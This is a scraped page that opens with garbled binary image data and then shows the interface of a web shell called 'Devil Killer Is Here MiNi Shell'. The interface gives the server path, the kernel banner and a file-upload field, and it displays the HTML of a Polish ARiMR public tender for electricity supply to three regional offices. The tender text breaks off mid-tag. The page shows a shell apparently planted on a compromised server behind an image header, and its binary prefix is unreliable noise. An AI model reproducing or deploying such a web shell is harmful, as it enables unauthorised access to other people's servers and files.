JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250411/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250411/0018750001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa energii elektrycznej obejmująca sprzedaż oraz świadczenie usług dystrybucji na potrzeby BP Podlaskiego OR ARiMR w Hajnówce, Suwałkach i Wysokiem Mazowieckiem na okres I.2026 r.-XII.2027 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ARiMR Agencja Restrukturyzacji i Modernizacji Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Podlaski Oddział Regionalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010613083</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48862156311</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48862164513</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">podlaski@arimr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arimr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - instytucja gospodarki budżetowej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wspieranie rozwoju rolnictwa i obszarów wiejskich w roli akredytowanej agencji płatniczej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa energii elektrycznej obejmująca sprzedaż oraz świadczenie usług dystrybucji na potrzeby BP Podlaskiego OR ARiMR w Hajnówce, Suwałkach i Wysokiem Mazowieckiem na okres I.2026 r.-XII.2027 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab73a816-168f-4642-b042-7ef06225a679</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00187500</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00105242/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa energii elektrycznej obejmująca sprzedaż oraz świadczenie usług dystrybucji na potrzeby BP Podlaskiego OR ARiMR w Hajnówce, Suwałkach i Wysokiem Mazowieckiem na okres I.2026 r.-XII.2027 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/arimr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami w niniejszym postępowaniu<br/>odbywa się przy użyciu środków komunikacji elektronicznej, tj. Platformy Zakupowej, zwanej dalej „Platformą Zakupową” dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/arimr, gdzie należy wybrać zakładkę „postępowania”, a następnie przejść na formularz<br/>niniejszego postępowania, gdzie Zamawiający zamieści dokumenty postępowania.<br/>2. Złożenie oferty wraz z Załącznikami odbywa się poprzez formularz składania ofert znajdujący się na Platformie Zakupowej (po<br/>przejściu do strony niniejszego postępowania z sekcji „Formularz”).<br/>3. Za datę przekazania (wpływu oświadczeń, dokumentów, wniosków, zawiadomień oraz informacji) przyjmuje się datę ich przesłania<br/>za pośrednictwem Platformy Zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Poniżej Zamawiający przedstawia<br/>wymagania techniczno-organizacyjne związane z udziałem Wykonawców w postępowaniu:<br/>1) złożenie oferty możliwe jest przez Wykonawców, którzy posiadają konto na Platformie Zakupowej oraz przez Wykonawców<br/>nieposiadających konta na Platformie Zakupowej. W celu założenia konta na Platformie Zakupowej należy wybrać zakładkę „Zaloguj<br/>się” w kolejnym kroku należy wybrać „Załóż konto”, następnie należy wypełnić formularze i postępować zgodnie z poleceniami<br/>wyświetlającymi się ekranie monitora. W przypadku Wykonawców niezalogowanych w celu złożenia oferty niezbędne jest podanie<br/>adresu e-mail (na który wysyłane będzie potwierdzenie złożenia oferty), numeru NIP oraz nazwy firmy i nieobowiązkowo numeru<br/>telefonu,<br/>2) ofertę oraz oświadczenie, o którym mowa w art. 125 Ustawy, należy złożyć pod rygorem nieważności w formie elektronicznej<br/>podpisanej kwalifikowanym podpisem elektronicznym przez osoby upoważnione do tej czynności lub postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do tych czynności.<br/>3) Wykonawca składa ofertę, która w przypadku prawidłowego złożenia oferty zostaje automatycznie zaszyfrowana przez system.<br/>Nie jest możliwe zapoznanie się z treścią złożonej oferty przed upływem terminu otwarcia ofert,<br/>4) podpisywanie dokumentów w formie skompresowanej poprzez opatrzenie całego pliku jednym podpisem kwalifikowanym,<br/>podpisem zaufanym lub podpisem elektronicznym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku<br/>odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym oraz z poświadczeniem za<br/>zgodność z oryginałem wszystkich elektronicznych kopii dokumentów. Dokumenty, co do których wymagana jest forma oryginału,<br/>muszą być podpisane indywidualnie (każdy z nich) kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. Podpisanie skompresowanego pliku, w którym umieszczono dokument w formie oryginału, nie stanowi podpisania tego<br/>dokumentu.<br/>2.<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików PDF.<br/>3. Dopuszczalne formaty przesyłanych danych t. j. plików wielkości do 150 MB. Zalecany format PDF.<br/>4. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z.<br/>5. Informacje na temat kodowania i czasu odbioru danych, t. j.:<br/>1) szyfrowanie na Platformie Zakupowej odbywa się za pomocą protokołu TLS 1.3,<br/>2) plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany nie jest widoczny dla Zamawiającego, gdyż jest w systemie<br/>zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez system, co następuje po terminie otwarcia<br/>ofert,<br/>3) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Dopuszczalny format kwalifikowanego podpisu elektronicznego, podpisu zaufanego oraz podpisu osobistego, w przypadku:<br/>1) dokumentów sporządzonych w formacie PDF zaleca się podpisanie dokumentu w formacie PAdES,<br/>2) dokumentów sporządzonych w formacie innym niż PDF zaleca się podpisanie dokumentu w formacie XAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna w zakresie przetwarzania danych osobowych została<br/>zamieszczona w Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający nie przewiduje ograniczeń stosowania przepisów Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) nr 2016/679 - zgodnie z art. 19 ust. 4 Ustawy prawo zamówień publicznych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOR10.2619.2.2025.AK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia w części I zamówienia jest dostawa energii elektrycznej obejmująca sprzedaż energii<br/>elektrycznej oraz świadczenie usług dystrybucji na potrzeby Biura Powiatowego Podlaskiego Oddziału Regionalnego<br/>ARiMR w Hajnówce, ul. Piłsudskiego 10, 17-200 Hajnówka.<br/>2. Zamówienie obejmuje usługę kompleksową w rozumieniu art. 3 ust. 30 ustawy Prawo energetyczne z 10.04.1997 r. (t. j.<br/>Dz. U. z 2024 r., poz. 266 ze zm.) polegającą na sprzedaży energii elektrycznej oraz zapewnieniu świadczenia usługi<br/>przesyłania/dystrybucji energii elektrycznej, realizowanej na podstawie umowy kompleksowej przez okres 24 miesięcy tj: od<br/>01.01.2026 r. do 31.12.2027 r.<br/>3. Lokal Biura Powiatowego Agencji Restrukturyzacji i Modernizacji Rolnictwa w Hajnówce zasilany jest w energię<br/>elektryczną przy użycia przyłącza elektro-energetycznego opomiarowanego licznikiem energii czynnej nr 56431104.<br/>4. Dane przyłączonego obiektu<br/>Biuro Powiatowe Agencji Restrukturyzacji i Modernizacji Rolnictwa w Hajnówce, ul. Józefa Piłsudskiego 10, 17-200<br/>Hajnówka<br/>Przeznaczenie obiektu: lokale niemieszkalne<br/>Grupa przyłączeniowa: V<br/>Napięcie zasilania: 0,4 kV<br/>Moc przyłączeniowa/moc umowna: 25 KW/25 Kw<br/>Prognozowane zużycie energii elektrycznej miesięczne/roczne: 1.480/17.760<br/>Kod PPE (Punktu Poboru Energii): 590543510300505212<br/>Napięcie pomiaru: 0,4 kV<br/>Właściciel układu pomiarowego: PGE Dystrybucja S.A.<br/>Wartość zabezpieczenia przedlicznikowego: 40A<br/>Grupa taryfowa: C11 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09310000-5 - Elektryczność</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65300000-6 - Przesył energii elektrycznej i podobne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2027-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia, w każdej z części zamówienia oddzielnie, Wykonawcy(om),<br/>którego(ych) oferta(y) odpowiadać będzie(ą) wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie(ną)<br/>oceniona jako najkorzystniejsza(e) w oparciu zasady wskazane w pkt 2.<br/>Przy wyborze najkorzystniejszej oferty, w każdej z część zamówienia, Zamawiający będzie kierował się kryterium „cena oferty brutto”<br/>z wagą 100%, gdyż – zgodnie z przepisem art. 246 ust. 2 Ustawy – Zamawiający określił w opisie przedmiotu zamówienia<br/>wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. Liczba<br/>punktów przyznanych ofertom zostanie wyliczona – dla każdej części zamówienia oddzielnie – zgodnie z poniższym wzorem:<br/>K = (C min.)/(C of.bad.)×100 pkt<br/>gdzie:<br/>K – liczba punktów przyznanych ofercie badanej (liczona z dokładnością do trzech miejsc po przecinku), w danej części,<br/>C min.– najniższa cena oferty brutto spośród ofert nieodrzuconych, w danej części,<br/>C of. bad. –cena oferty brutto oferty badanej, w danej części.<br/>Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.<br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o<br/>takiej samej cenie, zastosowanie będą miały zapisy art. 249 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia w części II zamówienia jest dostawa energii elektrycznej obejmująca sprzedaż energiielektrycznej oraz świadczenie usług dystrybucji na potrzeby Biura Powiatowego Podlaskiego Oddziału Regionalnego<br/>ARiMR w Suwałkach, ul. Sportowa 22, 16-400 Suwałki.<br/>2. Zamówienie obejmuje usługę kompleksową w rozumieniu art. 3 ust. 30 ustawy Prawo energetyczne z 10.04.1997 r. (t. j.<br/>Dz. U. z 2024 r., poz. 266 ze zm.) polegającą na sprzedaży energii elektrycznej oraz zapewnieniu świadczenia usługi<br/>przesyłania/dystrybucji energii elektrycznej, realizowanej na podstawie umowy kompleksowej przez okres 24 miesięcy tj: od<br/>01.01.2026 r. do 31.12.2027 r.<br/>3. Lokal Biura Powiatowego Agencji Restrukturyzacji i Modernizacji Rolnictwa w Biuro Powiatowe w Suwałkach zasilany jest<br/>w energię<br/>elektryczną przy użycia przyłącza elektro-energetycznego opomiarowanego licznikiem energii czynnej nr 72413922.<br/>4. Dane przyłączonego obiektu<br/>Biuro Powiatowe Agencji Restrukturyzacji i Modernizacji Rolnictwa w Suwałkach, ul. Sportowa 22, 16-400 Suwałki<br/>Przeznaczenie obiektu: lokale niemieszkalne<br/>Grupa przyłączeniowa: V<br/>Napięcie zasilania: 0,4 kV<br/>Moc przyłączeniowa/moc umowna: 31 KW/31 Kw<br/>Prognozowane zużycie energii elektrycznej miesięczne/roczne: 1.914/22.968<br/>Kod PPE (Punktu Poboru Energii): 590543510500559824<br/>Napięcie pomiaru: 0,4 kV<br/>Właściciel układu pomiarowego: PGE Dystrybucja S.A.<br/>Wartość zabezpieczenia przedlicznikowego: 50A<br/>Grupa taryfowa: C11 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09310000-5 - Elektryczność</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65300000-6 - Przesył energii elektrycznej i podobne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2027-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia, w każdej z części zamówienia oddzielnie, Wykonawcy(om),<br/>którego(ych) oferta(y) odpowiadać będzie(ą) wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie(ną)<br/>oceniona jako najkorzystniejsza(e) w oparciu zasady wskazane w pkt 2.<br/>Przy wyborze najkorzystniejszej oferty, w każdej z część zamówienia, Zamawiający będzie kierował się kryterium „cena oferty brutto”<br/>z wagą 100%, gdyż – zgodnie z przepisem art. 246 ust. 2 Ustawy – Zamawiający określił w opisie przedmiotu zamówienia<br/>wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. Liczba<br/>punktów przyznanych ofertom zostanie wyliczona – dla każdej części zamówienia oddzielnie – zgodnie z poniższym wzorem:<br/>K = (C min.)/(C of.bad.)×100 pkt<br/>gdzie:<br/>K – liczba punktów przyznanych ofercie badanej (liczona z dokładnością do trzech miejsc po przecinku), w danej części,<br/>C min.– najniższa cena oferty brutto spośród ofert nieodrzuconych, w danej części,<br/>C of. bad. –cena oferty brutto oferty badanej, w danej części.<br/>Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.<br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o<br/>takiej samej cenie, zastosowanie będą miały zapisy art. 249 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia w części III zamówienia jest dostawa energii elektrycznej obejmująca sprzedaż energii<br/>elektrycznej oraz świadczenie usług dystrybucji na potrzeby Biura Powiatowego Podlaskiego Oddziału Regionalnego<br/>ARiMR w Wysokiem Mazowieckiem, ul. Ludowa 7, 18-200 Wysokie Mazowieckie.<br/>2. Zamówienie obejmuje usługę kompleksową w rozumieniu art. 3 ust. 30 ustawy Prawo energetyczne z 10.04.1997 r. (t. j.<br/>Dz. U. z 2024 r., poz. 266 ze zm.) polegającą na sprzedaży energii elektrycznej oraz zapewnieniu świadczenia usługi<br/>przesyłania/dystrybucji energii elektrycznej, realizowanej na podstawie umowy kompleksowej przez okres 24 miesięcy tj: od<br/>01.01.2026 r. do 31.12.2027 r.<br/>3. Lokal Biura Powiatowego Agencji Restrukturyzacji i Modernizacji Rolnictwa w Wysokiem Mazowieckiem zasilany jest w<br/>energię<br/>elektryczną przy użycia przyłącza elektro-energetycznego opomiarowanego licznikiem energii czynnej nr 56332505.<br/>4. Dane przyłączonego obiektu<br/>Biuro Powiatowe Agencji Restrukturyzacji i Modernizacji Rolnictwa w Wysokiem Mazowieckiem, ul. Ludowa 7, 18-200<br/>Wysokie Mazowieckie<br/>Przeznaczenie obiektu: lokale niemieszkalne<br/>Grupa przyłączeniowa: V<br/>Napięcie zasilania: 0,4 kV<br/>Moc przyłączeniowa/moc umowna: 40 KW/40 Kw<br/>Prognozowane zużycie energii elektrycznej miesięczne/roczne: 2.721/32.652<br/>Kod PPE (Punktu Poboru Energii): 590543510300806401<br/>Napięcie pomiaru: 0,4 kV<br/>Właściciel układu pomiarowego: PGE Dystrybucja S.A.<br/>Wartość zabezpieczenia przedlicznikowego: 63A<br/>Grupa taryfowa: C11 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09310000-5 - Elektryczność</span></h3> <h3 